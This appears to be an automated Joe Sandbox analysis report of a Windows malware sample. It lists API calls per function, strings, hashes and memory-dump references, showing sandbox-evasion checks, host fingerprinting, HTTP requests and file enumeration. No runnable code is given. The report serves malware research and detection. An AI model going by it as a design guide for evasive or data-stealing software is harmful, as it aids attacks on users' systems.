Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,00845518,?,004210DC,?,00000000), ref: 0041A1FB
Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415124
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415181
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415337

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00414CD0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414D08

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 00414DA0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414DF8
Part of subcall function 00414DA0: lstrlenA.KERNEL32(00000000), ref: 00414E0F
Part of subcall function 00414DA0: StrStrA.SHLWAPI(00000000,00000000), ref: 00414E44
Part of subcall function 00414DA0: lstrlenA.KERNEL32(00000000), ref: 00414E63
Part of subcall function 00414DA0: strtok.MSVCRT ref: 00414E7E
Part of subcall function 00414DA0: lstrlenA.KERNEL32(00000000), ref: 00414E8E

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041526B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415420
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004154EC
Sleep.KERNEL32(0000EA60), ref: 004154FB

Strings

ERROR, xrefs: 0041525D
ERROR, xrefs: 00415412
ERROR, xrefs: 004154DE
ERROR, xrefs: 00415173
ERROR, xrefs: 00415116
ERROR, xrefs: 00415329

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: lstrcpylstrlen$Sleepstrtok
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3630751533-2791005934
Opcode ID: 203d5f14a6038a42c88ef36ed9ec87ff79a77854125bb14e1cf642e641269a3c
Instruction ID: 47717806d02ab2b23084bb80b202f8eeb65c1f88a6bcad5d58c416e3f74fe27f
Opcode Fuzzy Hash: 203d5f14a6038a42c88ef36ed9ec87ff79a77854125bb14e1cf642e641269a3c
Instruction Fuzzy Hash: 1FE1A671901104AACB14FBB1EC57EED7339AF94314F40852EB40666192EF3C6B9DCB9A

Function 00416FA0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00416FE2
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041701F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 004170A3
HeapAlloc.KERNEL32(00000000), ref: 004170AA
wsprintfA.USER32 ref: 004170E0

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Strings

:, xrefs: 00416FFC
\, xrefs: 00417000
C, xrefs: 00416FEC

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 11e96b5f598d36b5145eb5ca339976e7cb65ddbe81ead056b2f3bcd54bd5f766
Instruction ID: 54c0e4e4c236f1d7f0585d8ba6b1fa909b8b3bfc40374ef6a46e6daa0de72561
Opcode Fuzzy Hash: 11e96b5f598d36b5145eb5ca339976e7cb65ddbe81ead056b2f3bcd54bd5f766
Instruction Fuzzy Hash: 1341B1B1D04248EBDB20DFA4CC45BEEBBB8AF08714F14009DF50967281D7786A84CBA9

Function 007E003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 007E024D

Strings

cess, xrefs: 007E018D
kernel32.dll, xrefs: 007E008F, 007E0095

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 16dd53b31e236c2b8353203991b07fb74fcb2fe72e53336b0df64afbb24c18c3
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 87528874A01269DFDB64CF69C984BA8BBB1BF09304F1480D9E90DAB351DB74AE94DF10

Function 00416490 Relevance: 10.6, APIs: 7, Instructions: 89
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00419270: GetProcAddress.KERNEL32(77190000,0084DCD0), ref: 004192B1
Part of subcall function 00419270: GetProcAddress.KERNEL32(77190000,0084DCA0), ref: 004192CA
Part of subcall function 00419270: GetProcAddress.KERNEL32(77190000,0084DCE8), ref: 004192E2
Part of subcall function 00419270: GetProcAddress.KERNEL32(77190000,0084D158), ref: 004192FA
Part of subcall function 00419270: GetProcAddress.KERNEL32(77190000,0084D1E8), ref: 00419313
Part of subcall function 00419270: GetProcAddress.KERNEL32(77190000,008456A8), ref: 0041932B
Part of subcall function 00419270: GetProcAddress.KERNEL32(77190000,008466B8), ref: 00419343
Part of subcall function 00419270: GetProcAddress.KERNEL32(77190000,00846518), ref: 0041935C
Part of subcall function 00419270: GetProcAddress.KERNEL32(77190000,0084CF48), ref: 00419374
Part of subcall function 00419270: GetProcAddress.KERNEL32(77190000,0084D230), ref: 0041938C
Part of subcall function 00419270: GetProcAddress.KERNEL32(77190000,0084CFD8), ref: 004193A5
Part of subcall function 00419270: GetProcAddress.KERNEL32(77190000,0084CFF0), ref: 004193BD
Part of subcall function 00419270: GetProcAddress.KERNEL32(77190000,008466F8), ref: 004193D5
Part of subcall function 00419270: GetProcAddress.KERNEL32(77190000,0084D098), ref: 004193EE

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211

Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004164B7,00420ADA), ref: 0040116A
Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E

Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004164BC), ref: 0040112B
Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,004164BC), ref: 00401132
Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143

Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294

Part of subcall function 00416210: GetUserDefaultLangID.KERNEL32(?,?,004164C6,00420ADA), ref: 00416214

GetUserDefaultLangID.KERNEL32 ref: 004164C6

Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6

Part of subcall function 004172F0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417320
Part of subcall function 004172F0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417327
Part of subcall function 004172F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041733F

Part of subcall function 00417380: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004164CB), ref: 004173B0
Part of subcall function 00417380: HeapAlloc.KERNEL32(00000000,?,?,?,004164CB), ref: 004173B7
Part of subcall function 00417380: GetComputerNameA.KERNEL32(?,00000104), ref: 004173CF

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00845518,?,004210DC,?,00000000,?,004210E0,?,00000000,00420ADA), ref: 0041656A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416588
CloseHandle.KERNEL32(00000000), ref: 00416599
Sleep.KERNEL32(00001770), ref: 004165A4
CloseHandle.KERNEL32(?,00000000,?,00845518,?,004210DC,?,00000000,?,004210E0,?,00000000,00420ADA), ref: 004165BA
ExitProcess.KERNEL32 ref: 004165C2

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleLangName__aulldiv$ComputerCreateCurrentGlobalInfoMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 1125299040-0
Opcode ID: f5cd3a1d8a558202e0912a61cb1b228e4a533b036098cbf949c8092211e551f8
Instruction ID: 0c3fac6cf7b50bea5c1f94bc3db5f65e3227356296d56eb517008ea5f4118e6e
Opcode Fuzzy Hash: f5cd3a1d8a558202e0912a61cb1b228e4a533b036098cbf949c8092211e551f8
Instruction Fuzzy Hash: 03317130941108BACB14FBF2DC56BEE7739AF18318F50452EF513A6092DFBC6985C66A

Function 00404800 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??_U@YAPAXI@Z.MSVCRT ref: 0040483A
??_U@YAPAXI@Z.MSVCRT ref: 00404851
??2@YAPAXI@Z.MSVCRT ref: 00404868
lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Strings

<, xrefs: 00404819

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: ??2@CrackInternetlstrlen
String ID: <
API String ID: 184842949-4251816714
Opcode ID: 59693407489f90c3cdb96c3bdf34aef2329dc52aa92972b47e71a7c994f894f8
Instruction ID: 93cf72731df314aae8b190796811ac6c8ed605cccc68025416595ba5c6ffb16c
Opcode Fuzzy Hash: 59693407489f90c3cdb96c3bdf34aef2329dc52aa92972b47e71a7c994f894f8
Instruction Fuzzy Hash: 0A2129B1D00208ABDF14DFA5E849ADD7B75FF44364F108229F926A72D0DB706A05CF95

Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
__aulldiv.LIBCMT ref: 00401258
__aulldiv.LIBCMT ref: 00401266
ExitProcess.KERNEL32 ref: 00401294

Strings

@, xrefs: 00401233

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: ea570c17900da72c0ff61e466dfdba6c639ea0a5e55046902d87947f1e012f1f
Instruction ID: 3a295e2926d3a661784167dae5cc93d3585e5da9a2cb48fc087cd8b2851d2611
Opcode Fuzzy Hash: ea570c17900da72c0ff61e466dfdba6c639ea0a5e55046902d87947f1e012f1f
Instruction Fuzzy Hash: 8601FBB0D40308BAEB10EBE4DD49B9EBB78AB14705F20809EEA05B62D0D7785585875D

Function 00416593 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00845518,?,004210DC,?,00000000,?,004210E0,?,00000000,00420ADA), ref: 0041656A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416588
CloseHandle.KERNEL32(00000000), ref: 00416599
Sleep.KERNEL32(00001770), ref: 004165A4
CloseHandle.KERNEL32(?,00000000,?,00845518,?,004210DC,?,00000000,?,004210E0,?,00000000,00420ADA), ref: 004165BA
ExitProcess.KERNEL32 ref: 004165C2

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: e67069b7a25109c1f103972856e5ff06790c1bc0ba95d107da3788f3134d6b09
Instruction ID: a64f93d993f1e87f951aacd978fe42101be04856bc676c4d6d5bcee74d417e49
Opcode Fuzzy Hash: e67069b7a25109c1f103972856e5ff06790c1bc0ba95d107da3788f3134d6b09
Instruction Fuzzy Hash: F0F08230900605FFEB20ABA0EC09BFE7736AF04715F11441BB916A51D5CBF89582CA6E

Function 00414CD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 004062D0: InternetOpenA.WININET(00420DE6,00000001,00000000,00000000,00000000), ref: 00406331
Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,0087CDA8), ref: 00406353
Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,0087C3D0,00000000,00000000,00400100,00000000), ref: 004063D5
Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414D08

Strings

ERROR, xrefs: 00414CFA
ERROR, xrefs: 00414D53

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: c1babed458c8dc806792490da893888d1c980e7372b308e2ca17d96e2eb200fa
Instruction ID: 9b7a9698bb488a37f3de611b15de8acf20b28e6af01427a962a44d236a29daab
Opcode Fuzzy Hash: c1babed458c8dc806792490da893888d1c980e7372b308e2ca17d96e2eb200fa
Instruction Fuzzy Hash: 7F113330901108B7CB14FF61DC56AED7338AF50354F90816EF80B5A5A2EF786B95C75A

Function 00417380 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004164CB), ref: 004173B0
HeapAlloc.KERNEL32(00000000,?,?,?,004164CB), ref: 004173B7
GetComputerNameA.KERNEL32(?,00000104), ref: 004173CF

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: 9cad883e92767d667f7a3bd3c491df47bdb8f8355287bf46401cfbf98ae607a3
Instruction ID: 42712b1d228129e2e67f3f866f9c43061177fb5da2658b34d54d74d13c44c576
Opcode Fuzzy Hash: 9cad883e92767d667f7a3bd3c491df47bdb8f8355287bf46401cfbf98ae607a3
Instruction Fuzzy Hash: BC0181B1A08608EBC710CF99DD45BEEBBB8FB04721F20021AF905E3690D7785945CBA5

Function 00401110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004164BC), ref: 0040112B
VirtualAllocExNuma.KERNEL32(00000000,?,?,004164BC), ref: 00401132
ExitProcess.KERNEL32 ref: 00401143

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 678cf5f3e7197d72abcfc3c147a4750855ebb5e345b53b76b616ef84aefebb1b
Instruction ID: 0e2e6d3d2f445679f77a7861b9af8e0e8f55b174cdb9f0aa425208459b8dc1b3
Opcode Fuzzy Hash: 678cf5f3e7197d72abcfc3c147a4750855ebb5e345b53b76b616ef84aefebb1b
Instruction Fuzzy Hash: 3DE08670945308FBE7205FA09C0AB4D76689B04B05F105056F708BA1E0C6B82501865C

Function 008580DD Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00858105
Module32First.KERNEL32(00000000,00000224), ref: 00858125

Memory Dump Source

Source File: 00000003.00000002.1459945134.000000000084E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0084E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_84e000_169F.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: f81e3126fbea1ed316dc840b49b6c9b46fb2b65de8b70059bbf749ada633af5b
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 76F06831200B14ABD7203AB9AC8DA6A76E8FF45765F100529EA46E10C0DF70E84A4B51

Function 007E0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,007E0223,?,?), ref: 007E0E19
SetErrorMode.KERNEL32(00000000,?,?,007E0223,?,?), ref: 007E0E1E

Memory Dump Source

Source File: 00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7e0000_169F.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 7a55b1bb0ad5a630dcb172cb140b2a30c45defdff20bc49bbe57137cadadddd3
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 4CD0123114512877D7003A95DC09BCD7B1CDF09B62F008421FB0DD9080C7B4994046E5

Function 004010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,004164BC), ref: 004010B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,004164BC), ref: 004010F7

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: f9d4902d87d53e064eb978b4b4efccb4618282ab89b9805507bbfbdb43c54504
Instruction ID: f48f966fb8dbc32d8d9482a6eca9c47ea769ab036d71d5fa6551aa32425d7b68
Opcode Fuzzy Hash: f9d4902d87d53e064eb978b4b4efccb4618282ab89b9805507bbfbdb43c54504
Instruction Fuzzy Hash: 62F02771641218BBE7149BA4AD49FAFB7DCE705B08F304459F940E3390D5719F00DA64

Function 00401190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00417380: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004164CB), ref: 004173B0
Part of subcall function 00417380: HeapAlloc.KERNEL32(00000000,?,?,?,004164CB), ref: 004173B7
Part of subcall function 00417380: GetComputerNameA.KERNEL32(?,00000104), ref: 004173CF

Part of subcall function 004172F0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417320
Part of subcall function 004172F0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417327
Part of subcall function 004172F0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041733F

ExitProcess.KERNEL32 ref: 004011C6

Memory Dump Source

Source File: 00000003.00000002.1459490232.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1459490232.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000049F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.00000000004C4000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000062C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1459490232.000000000063E000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_169F.jbxd

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: 0dde54e68933c144dc9d433c77b62f5ff363c8b2548fcf823f9b9f06c0cc5b37
Instruction ID: 84cbab3e625f5c703ca2aee7bdcd0b4d96e9050e400d57d2133d1b743e823249
Opcode Fuzzy Hash: 0dde54e68933c144dc9d433c77b62f5ff363c8b2548fcf823f9b9f06c0cc5b37
Instruction Fuzzy Hash: 8EE0C27190070222DB2033B66C06B6B329D0B1435DF00052EFA08D7252FE3CF81182AC

Function 00857D9C Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00857DED

Memory Dump Source

Source File: 00000003.00000002.1459945134.000000000084E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0084E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_84e000_169F.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: aeab652669f25e912bd6828cc0979bd67eaf6b838b28c6f504af4d4207f01b94
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 83112B79A00208EFDB01DF98C985E99BBF5EF08751F058094F948AB362D771EE54DB80

Non-executed Functions

Function 004133C0 Relevance: 45.8, APIs: 20, Strings: 6, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 004133DC
FindFirstFileA.KERNEL32(?,?), ref: 004133F3
lstrcat.KERNEL32(?,?), ref: 00413445
StrCmpCA.SHLWAPI(?,00420F40), ref: 00413457
StrCmpCA.SHLWAPI(?,00420F44), ref: 0041346D
FindNextFileA.KERNEL32(000000FF,?), ref: 00413777
FindClose.KERNEL32(000000FF), ref: 0041378C

Strings

%s%s, xrefs: 004135BD
%s\%s\%s, xrefs: 0041355A
